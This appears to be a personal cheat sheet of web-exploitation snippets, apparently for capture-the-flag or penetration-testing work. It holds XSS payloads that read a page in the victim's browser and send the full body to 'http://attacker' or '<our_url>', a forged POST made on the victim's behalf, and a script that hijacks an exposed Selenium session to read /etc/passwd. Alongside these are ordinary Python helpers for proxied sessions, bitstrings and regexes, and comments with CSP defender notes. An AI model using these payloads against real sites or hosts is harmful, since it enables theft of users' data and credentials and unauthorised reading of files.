
Post request with session

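import requests
import re

# Route traffic through a local intercepting proxy (port 8080 is the usual
# default for such tools); only plain-http URLs are covered by this dict.
http_proxy = "http://127.0.0.1:8080"
proxyDict = {
    "http": http_proxy,
}

# A Session keeps the cookies set by the first response (e.g. PHPSESSID) and
# replays them on later requests, so the cookie does not have to be copied by
# hand -- and a response without that cookie no longer raises KeyError.
# Attaching the proxies to the session also sends the initial GET through the
# proxy, which the original per-call argument did not.
session = requests.Session()
session.proxies = proxyDict

# get a session
r = session.get('<url>')
# send request (session cookies from the GET above are attached automatically)
r = session.post('<url>', data={'key': 'value'})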

XSS web request on behalf of victim, sending complete webpage back

// Request <target_url> from inside the victim's browser; the full response
// body lands in xhr.response once onload fires.
xhr = new XMLHttpRequest();
xhr.onload = function() {
    // Second request carries the entire response body to <our_url> as the
    // query string.
    // Defender note: a Content-Security-Policy `connect-src` that does not
    // allow <our_url>'s origin blocks this outbound request.
    x = new XMLHttpRequest();
    x.open("GET", '<our_url>?'+xhr.response);
    x.send(null);
}
xhr.open("GET", '<target_url>');
xhr.send(null);
Alternative using fetch:
// Same idea with fetch(): read http://target with the browser's stored
// credentials, then POST the base64-encoded body to http://attacker.  The
// commented-out `+btoa(r)` is the author's query-string variant.
// Defender note: a CSP `connect-src` excluding the second origin blocks the
// outbound fetch.
fetch('http://target', { credentials: 'include'}).then(res=>res.text()).then((r)=>fetch("http://attacker/?x="/*+btoa(r)*/,{credentials: 'include', "method":"POST", "body":btoa(r)}));

XSS post request on behalf of the victim, with custom cookies

var xhr = new XMLHttpRequest();
// Sets a cookie for the current document's origin; it rides along with the
// POST below only if <target uri> is same-origin (not verified here).
document.cookie = "key=value;";
var uri ="<target uri>";
// NOTE: this replaces the object created on the first line, so one of the two
// `new XMLHttpRequest()` calls is redundant.
xhr = new XMLHttpRequest();
// Asynchronous POST (third argument true) with a form-encoded body.
xhr.open("POST", uri, true);
xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
xhr.send("<post body>");

Manipulate bitstring

# Convert bit string to byte array
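def bitstring_to_bytes(s):
    """Convert a string of '0'/'1' characters to bytes, big-endian.

    The result is ``ceil(len(s) / 8)`` bytes long, so leading zero bits are
    kept: ``"0000000001000001"`` gives ``b"\\x00A"``, not ``b"A"`` as the
    previous shift loop did.  A partial leading byte is zero-padded on the
    left.

    Args:
        s: the bit string, e.g. ``"01000001"``.

    Returns:
        ``bytes`` (``str`` on Python 2) holding the packed bits; ``b""`` when
        ``s`` is empty.

    Raises:
        ValueError: if ``s`` contains anything other than '0' and '1'.
    """
    if not s:
        return b""
    nbytes = (len(s) + 7) // 8
    v = int(s, 2)
    b = bytearray(nbytes)
    # Peel off the least significant byte first and write the array
    # back-to-front, so no reversal is needed afterwards.
    for i in range(nbytes - 1, -1, -1):
        b[i] = v & 0xff
        v >>= 8
    return bytes(b)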
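base = "010101..."  # the bit string
n = 8  # change something every n bits
result = ""
# Iterate over bitstring, doing something every n bits.
# NOTE: these bounds start at bit n and stop before len(base) - n, so the
# leading and trailing chunks are not visited; widen them to walk the whole
# string.  range() replaces the Python 2-only xrange() so the snippet also
# runs on Python 3 (on Python 2 it iterates the same values).
for i in range(n, len(base) - n, n):
    # do manipulation here (typically on the chunk base[i:i + n]); `num` is
    # a placeholder for the bits produced in this step
    result += num
print(bitstring_to_bytes(result))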

Named capture groups

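# Named optional group: `(?P<e>\d+){0,1}` binds the digits after "e : " to
# the name 'e'.  The pattern is a raw string so the `\s` / `\d` escapes are
# left to the regex engine (Python 3.12+ warns about them in plain strings);
# the pattern text itself is unchanged.
m = re.search(r'[e]\s:\s(?P<e>\d+){0,1}', text.decode('utf-8'))
# groupdict() lists every named group whether or not it matched, so the old
# `'e' in m.groupdict()` test was true for any match and int(None) could be
# reached when the optional group did not participate.  Test the captured
# value instead.
if m is not None and m.group('e') is not None:
    e = int(m.group('e'))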

Use Selenium to read local files

'''
curl -d '{"capabilities": {"firstMatch": [{"browserName": "firefox", "moz:firefoxOptions": {"args": [ "-headless"], "log": {"level": "trace"}}}]}}' http://127.0.0.1:41145/session
'''
from selenium import webdriver
from selenium.webdriver.remote.webdriver import WebDriver
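def attach_to_session(executor_url, session_id):
    """Return a Remote WebDriver bound to an already running session.

    ``webdriver.Remote`` always issues a "newSession" command when it is
    constructed.  ``WebDriver.execute`` is patched for the duration of that
    construction so the command is answered locally with ``session_id``
    instead of reaching the server; every other command passes through.

    Args:
        executor_url: base URL of the WebDriver server, e.g.
            ``http://127.0.0.1:41145``.
        session_id: id of the existing session to reuse.

    Returns:
        A ``webdriver.Remote`` whose ``session_id`` is ``session_id``.

    Raises:
        Whatever ``webdriver.Remote`` raises.  The original ``execute`` is
        restored in all cases; the previous version left the patch in place
        when construction failed, affecting every later WebDriver instance.
    """
    original_execute = WebDriver.execute

    def new_command_execute(self, command, params=None):
        # Short-circuit only session creation.  The response shape is the one
        # the original snippet used -- confirm it against the installed
        # selenium version.
        if command == "newSession":
            return {'success': 0, 'value': None, 'sessionId': session_id}
        return original_execute(self, command, params)

    WebDriver.execute = new_command_execute
    try:
        # `desired_capabilities={}` is kept from the original; newer selenium
        # releases may expect `options=` instead -- check the version in use.
        driver = webdriver.Remote(command_executor=executor_url, desired_capabilities={})
    finally:
        # Undo the class-level monkeypatch even if construction failed.
        WebDriver.execute = original_execute
    driver.session_id = session_id
    return driver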
bro = attach_to_session('http://127.0.0.1:41145', 'bb2d2142-8a61-446b-9bcc-16751ce20b49')
21
bro.get('file:///etc/passwd')
22
print(bro.page_source)